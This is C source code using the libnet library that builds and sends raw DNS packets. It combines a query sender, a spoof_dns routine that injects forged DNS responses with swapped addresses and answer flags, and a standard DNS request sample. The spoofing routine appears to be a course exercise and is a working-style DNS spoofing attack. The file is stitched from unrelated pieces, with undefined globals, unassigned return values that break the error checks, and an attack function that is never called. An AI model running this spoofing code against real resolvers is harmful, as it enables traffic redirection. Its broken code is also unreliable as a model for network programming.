/* include send_dns_query_libnet */
void
send_dns_query(void)
{
char qbuf[24], *ptr;
u_int16_t one;
int packet_size = LIBNET_UDP_H + LIBNET_DNSV4_H + 24;
static libnet_ptag_t ip_tag, udp_tag, dns_tag;
/* build query portion of DNS packet */
ptr = qbuf;
memcpy(ptr, "\001a\014root-servers\003net\000", 20);
ptr += 20;
one = htons(1);
memcpy(ptr, &one, 2); /* query type = A */
ptr += 2;
memcpy(ptr, &one, 2); /* query class = 1 (IP addr) */
/* build DNS packet */
dns_tag = libnet_build_dnsv4(
1234 /* identification */,
0x0100 /* flags: recursion desired */,
1 /* # questions */, 0 /* # answer RRs */,
0 /* # authority RRs */, 0 /* # additional RRs */,
qbuf /* query */, 24 /* length of query */, l, dns_tag);
/* build UDP header */
udp_tag = libnet_build_udp(
((struct sockaddr_in *) local)->sin_port /* source port */,
((struct sockaddr_in *) dest)->sin_port /* dest port */,
packet_size /* length */, 0 /* checksum */,
NULL /* payload */, 0 /* payload length */, l, udp_tag);
/* Since we specified the checksum as 0, libnet will automatically */
/* calculate the UDP checksum. Turn it off if the user doesn't want it. */
if (zerosum)
if (libnet_toggle_checksum(l, udp_tag, LIBNET_OFF) < 0)
err_quit("turning off checksums: %s\n", libnet_geterror(l));
/* build IP header */
/* *INDENT-OFF* */
ip_tag = libnet_build_ipv4(packet_size + LIBNET_IPV4_H /* len */,
0 /* tos */, 0 /* IP ID */, 0 /* fragment */,
TTL_OUT /* ttl */, IPPROTO_UDP /* protocol */,
0 /* checksum */,
((struct sockaddr_in *) local)->sin_addr.s_addr /* source */,
((struct sockaddr_in *) dest)->sin_addr.s_addr /* dest */,
NULL /* payload */, 0 /* payload length */, l, ip_tag);
/* *INDENT-ON* */
if (libnet_write(l) < 0)
{
err_quit("libnet_write: %s\n", libnet_geterror(l));
}
if (verbose)
printf("sent: %d bytes of data\n", packet_size);
}
/* Build the new packet and inject it */
void spoof_dns(char *device)
{
// printf("Common Dude!");
struct in_addr src, dst, spoof; /* For printing addresses */
int inject_size; /* Number of bytes of injected packet */
int packet_size; /* Size of the packet */
int i; /* misc */
u_char *packet; /* Packet to be built */
libnet_t *handler; /* Libnet handler */
libnet_ptag_t dns, tcp, udp, ip; /* Libnet ptags */
char errbuf[LIBNET_ERRBUF_SIZE]; /* Error buffer */
packet_size = spoofpacket.payload_size + LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_DNS_H;
/* Open a raw socket */
handler = libnet_init(LIBNET_RAW4, device, errbuf);
if (handler == NULL)
{
printf("Error opening a socket: %s\n", errbuf);
exit(1);
}
/* DNS header construction */
dns = 0;
udp = 0;
tcp = 0;
ip = 0;
/*****************************************************/
/******* USE: libnet to construct DNS header here ****/
/*****************************************************/
libnet_build_dnsv4 ( LIBNET_UDP_DNSV4_H,
spoofpacket.dns_id,
0x8180,
1,
1,
0,
0,
spoofpacket.payload, //insert payload
spoofpacket.payload_size, //36 //insert length
handler,
dns );
if (dns == -1) {
printf("Building DNS header failed: %s\n", libnet_geterror(handler));
exit(1);
}
// printf("DST PORT: %d\n", spoofpacket.dst_port);
// printf("SRC PORT: %d\n", spoofpacket.src_port);
//printf("UDP Data: %d\n", spoofpacket.payload_size);
/* UDP header construction */
/*** Use libnet to construct UDP header here **/
libnet_build_udp ( spoofpacket.dst_port,
spoofpacket.src_port,
spoofpacket.payload_size + LIBNET_DNS_H + LIBNET_UDP_H, // 36 + 12 + 8
0, //insert UDP checksum. have to check later
NULL, //insert payload
0, //insert lenghth
handler,
udp );
if (udp ==-1) {
printf("Building UDP header failed: %s\n", libnet_geterror(handler));
exit(1);
}
/* IP header construction */
/*****************************************************/
/******* USE: libnet to construct IP header here ****/
/*****************************************************/
libnet_build_ipv4 ( packet_size, //56 + 20
0,
6888, //libnet_get_prand (LIBNET_PRu16)
0,
127,
IPPROTO_UDP,
0, ////insert IP checksum value. have to check later
spoofpacket.dst_address,
spoofpacket.src_address,
NULL, //insert payload
0, //insert length
handler,
ip );
//Remember, all length can be debatable
if (ip == -1) {
printf("Building IP header failed: %s\n", libnet_geterror(handler));
exit(1);
}
/* Calculate checksum */
/****** USE: libnet function to generate checksum*******/
/*******************************************************/
/* Inject the packet */
/*******************************************************/
inject_size = libnet_write(handler);
//printf("Inject: %d\n", inject_size);
if (inject_size == -1)
{
printf("Write failed: %s\n", libnet_geterror(handler));
}
printf("--- Spoofed DNS Response injected ---\n\n");
/* Destroy the packet */
/*******************************************************/
/**************** USE: libnet_destroy() ****************/
/*******************************************************/
libnet_destroy(handler);
}
int
main(int argc, char *argv[])
{
char c;
u_long src_ip = 0, dst_ip = 0;
u_short type = LIBNET_UDP_DNSV4_H;
libnet_t *l;
libnet_ptag_t ip;
libnet_ptag_t ptag4; /* TCP or UDP ptag */
libnet_ptag_t dns;
char errbuf[LIBNET_ERRBUF_SIZE];
char *query = NULL;
char payload[1024];
u_short payload_s;
printf("libnet 1.1 packet shaping: DNSv4[raw]\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (!l)
{
fprintf(stderr, "libnet_init: %s", errbuf);
exit(EXIT_FAILURE);
}
/*
* parse options
*/
while ((c = getopt(argc, argv, "d:s:q:t")) != EOF)
{
switch (c)
{
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'q':
query = optarg;
break;
case 't':
type = LIBNET_TCP_DNSV4_H;
break;
default:
exit(EXIT_FAILURE);
}
}
if (!src_ip)
{
src_ip = libnet_get_ipaddr4(l);
}
if (!dst_ip || !query)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
/*
* build dns payload
*/
payload_s = snprintf(payload, sizeof payload, "%c%s%c%c%c%c%c",
(char)(strlen(query)&0xff), query, 0x00, 0x00, 0x01, 0x00, 0x01);
/*
* build packet
*/
dns = libnet_build_dnsv4(
type, /* TCP or UDP */
0x7777, /* id */
0x0100, /* request */
1, /* num_q */
0, /* num_anws_rr */
0, /* num_auth_rr */
0, /* num_addi_rr */
payload,
payload_s,
l,
0
);
if (dns == -1)
{
fprintf(stderr, "Can't build DNS packet: %s\n", libnet_geterror(l));
goto bad;
}
if (type == LIBNET_TCP_DNSV4_H) /* TCP DNS */
{
ptag4 = libnet_build_tcp(
0x6666, /* source port */
53, /* destination port */
0x01010101, /* sequence number */
0x02020202, /* acknowledgement num */
TH_PUSH|TH_ACK, /* control flags */
32767, /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H + LIBNET_TCP_DNSV4_H + payload_s, /* TCP packet size */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (ptag4 == -1)
{
fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
goto bad;
}
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H + type + payload_s,/* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (ip == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
exit(EXIT_FAILURE);
}
}
else /* UDP DNS */
{
ptag4 = libnet_build_udp(
0x6666, /* source port */
53, /* destination port */
LIBNET_UDP_H + LIBNET_UDP_DNSV4_H + payload_s, /* packet length */
0, /* checksum */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (ptag4 == -1)
{
fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
goto bad;
}
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_UDP_H + type + payload_s,/* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_UDP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (ip == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
exit(EXIT_FAILURE);
}
}
/*
* write to the wire
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte DNS packet; check the wire.\n", c);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
